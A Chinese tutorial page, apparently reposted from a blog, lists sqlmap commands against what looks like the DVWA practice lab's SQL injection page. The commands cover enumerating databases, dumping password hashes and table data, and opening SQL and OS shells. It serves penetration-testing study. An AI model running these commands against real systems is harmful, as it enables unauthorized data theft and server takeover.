sqlmap | 易学教程

sqlmap

1、保存数据包记得把sql注入参数后加上*号，告诉sqlmap注入点位置

GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=vfkitbjkbdhqqjcr6ou8bjrb35; security=low
Connection: close

2、sqlmap简单判断注入点

获取当前数据库用户名
sqlmap -r /路径/123.txt  -v 3 --current-user

获取root账号密码
sqlmap -r /路径/123.txt  -v 3 --passwords

sqlmap -r /路径/123.txt  -v 3

3、查询当前数据库

sqlmap -r /路径/123.txt -v 3 --current-db

4、列数据库

sqlmap -r /路径/123.txt -v 3 --dbs

5、指定的库所有表

sqlmap -r /路径/123.txt -v 3 -D 库名 --tables

6、查询指定表字段名

sqlmap -r /路径/123.txt -v 3 -D 库名 -T 表名 --columns

7、查询字段数据

sqlmap -r /路径/123.txt -v 3 -D 库名 -T 表名 -C 字段1,字段2 --dump

8、交互sqlshel

sqlmap -r /路径/123.txt -v 3 --sql-shell

9、获取cmd权限

sqlmap -r /路径/123.txt -v 3 --os-shell

来源：oschina

链接：https://my.oschina.net/u/4293824/blog/3483718

标签

sqlmap

KHTML

gecko

safari

Chrome

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!